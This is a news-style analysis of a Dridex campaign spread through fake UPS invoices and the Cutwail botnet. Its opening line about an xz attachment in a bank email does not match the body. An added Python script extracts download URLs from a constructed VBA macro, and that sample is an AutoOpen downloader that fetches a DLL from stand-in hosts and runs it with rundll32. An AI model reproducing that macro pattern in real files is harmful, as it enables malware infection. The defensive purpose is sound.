The xz attachment of a fake bank email contains an exe file: the malware.
Technical analysis by the Malware Hunter JAMESWT
Dridex leverages fake UPS invoices and the Cutwail botnet to spread in a new global campaign. The email contains a link that downloads a .doc file. When the document is opened, it contacts a URL chosen at random from an internal list of nine and downloads a DLL, which starts the infection chain.
Dridex is spreading in a global malspam campaign that combines an email link with a Word document. The email, presented as a UPS invoice, carries a link to a URL which, if opened, downloads a .doc file. When the document is opened, it contacts a URL chosen at random from an internal list of nine and downloads a DLL, which starts the malware infection chain. Moreover, as cybersecurity researcher moto_sato observed, the malicious documents are distributed by the Cutwail botnet. Dridex is a dangerous banking Trojan used by cybercrime groups, and it has long been a protagonist of campaigns all over the world, especially those with a courier theme. The targets are mainly companies, but not exclusively.
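The "random URL from an internal list of nine" detail matters for defenders: detonating the document once in a sandbox shows only one of the nine download locations, so the other eight never reach the blocklist. The script below is an added example, not code from the article or from the researchers it cites. It assumes the macro source has already been dumped from the .doc (for instance with olevba); the macro text and all URLs in it are constructed stand-ins, and the `Fetch` helper in the macro is hypothetical. It statically recovers every URL, including ones split with VBA string concatenation, and contrasts that with how few URLs repeated detonations would reveal.

```python
import random
import re
from urllib.parse import urlparse

# Constructed stand-in for macro source dumped from a maldoc. The domains,
# paths and the Fetch() helper are hypothetical; real Dridex documents differ.
CONSTRUCTED_MACRO = r'''
Sub AutoOpen()
    Dim u(8) As String
    u(0) = "http://dl-one.exam" & "ple/c/a.dll"
    u(1) = "http://dl-two.example/c/b.dll"
    u(2) = "ht" & "tp://dl-three.example/c/c.dll"
    u(3) = "http://dl-four.example/c/d.dll"
    u(4) = "http://dl-five.exa" & "mple/c/e.dll"
    u(5) = "https://dl-six.example/c/f.dll"
    u(6) = "http://dl-seven.example/c/g.dll"
    u(7) = "http://dl-ei" & "ght.example/c/h.dll"
    u(8) = "http://dl-nine.example/c/i.dll"
    Randomize
    idx = Int(Rnd() * 9)
    Call Fetch(u(idx), Environ("TEMP") & "\p.dll")
    Shell "rundll32.exe " & Environ("TEMP") & "\p.dll,Start"
End Sub
'''

# VBA splits literals as "abc" & "def"; joining them back is the minimum
# deobfuscation needed before a URL regex will see the whole string.
CONCAT = re.compile(r'"\s*&\s*"')
URL_RE = re.compile(r'https?://[^\s"\']+')


def deobfuscate_concat(src: str) -> str:
    """Join adjacent VBA string literals so split URLs become contiguous."""
    return CONCAT.sub("", src)


def extract_urls(src: str) -> list[str]:
    """Statically recover every download URL embedded in the macro."""
    return sorted(set(URL_RE.findall(deobfuscate_concat(src))))


def indicators(urls: list[str]) -> list[str]:
    """Hostnames to feed a DNS/proxy blocklist."""
    return sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})


def simulate_detonation(urls: list[str], runs: int, seed: int = 0) -> set[str]:
    """Model the macro's random pick: each sandbox run observes one URL."""
    rng = random.Random(seed)
    return {rng.choice(urls) for _ in range(runs)}


if __name__ == "__main__":
    urls = extract_urls(CONSTRUCTED_MACRO)
    print(f"static extraction recovered {len(urls)} URLs")
    for host in indicators(urls):
        print("  block:", host)
    seen = simulate_detonation(urls, runs=1)
    print(f"one detonation revealed {len(seen)} of {len(urls)} URLs")
```

Static extraction recovers all nine hostnames from the constructed macro, while a single detonation yields exactly one. Against a real sample the regex is only a first pass: Dridex macros often build strings with Chr() or reversed text, so treat any run that returns fewer URLs than the document's array size as incomplete.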